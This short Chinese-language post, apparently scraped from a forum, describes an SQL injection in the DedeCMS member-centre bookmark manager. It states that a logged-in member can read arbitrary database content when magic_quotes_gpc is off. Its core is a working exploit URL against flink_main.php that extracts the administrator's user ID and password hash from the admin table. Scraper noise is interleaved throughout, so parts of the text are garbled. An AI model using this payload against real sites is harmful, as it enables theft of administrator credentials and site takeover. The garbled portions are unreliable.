DedeCMS会员中心SQL注射漏洞
/ U# C) G- h- ~需要magic_quotes_gpc = Off9 B. v6 u) K+ k+ T" F
会员登录后可以执行SQL语句查询数据库任意内容如管理员密码.6 H! V9 B) y# J7 V+ q- V
) T) @5 Y- J& w8 g1 t
DedeCMS会员中心书签管理SQL注射漏洞
/ K* T ?) A7 }' \2 r成功利用该漏洞可获得管理员密码
5 C1 H- o, s7 ^8 h [
& `; G5 \3 K! b E5 j' o会员登录后可以执行SQL语句查询数据库任意内容如管理员密码8 W2 B5 Q7 I7 i. L1 m3 t G* u
& \# R( r1 T6 Z% S8 O! ?8 y
http://bt/member/flink_main.php?dopost=update&aid=1&title=c4rp3nt3r&url=http://www.0x50sec.org',title=@`'`,url=(select concat(userid,0x3a,pwd) from `%23@__admin` limit 1),title='c4rp3nt3r7 [3 t9 C9 P" S8 T
|